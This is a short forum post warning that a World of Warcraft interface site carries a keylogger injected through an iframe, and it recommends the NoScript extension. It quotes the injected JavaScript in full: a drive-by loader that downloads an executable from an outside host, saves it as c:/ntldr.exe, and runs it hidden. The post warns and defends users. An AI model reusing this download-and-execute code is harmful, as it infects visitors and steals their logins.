P.S.: People that use Mozilla/Firefix might want to keep an eye out for the extention called "NoScript" - quite handy to block these kind of keyloggers. Link:

Code:
At this moment in time, there is a keylogger embedded into the ui.worldofwar.net homepage. The keylogger itself is in an iframe embedded from hxxp://ui.bcegame.com/pps.exe (do not visit!). Do not under any circumstances visit ui.worldofwar.net ! The actual keylogger iframe: hxxp://ui.bcegame.com/wm.htm Keylogger iframe src: xPost.Open('GET','httxxxp://ui.bcegame.com/pps.exe',0); xPost.Send(); var sGet=df.CreateObject('ADODB.Stream',''); sGet.Mode=3; sGet.Type=1; sGet.Open(); sGet.Write(xPost.ResponseBody); sGet.SaveToFile('c:/ntldr.exe',2); var x = df.CreateObject('wscript.shell',''); x.run'c:/ntldr.exe',0);
(source:
)






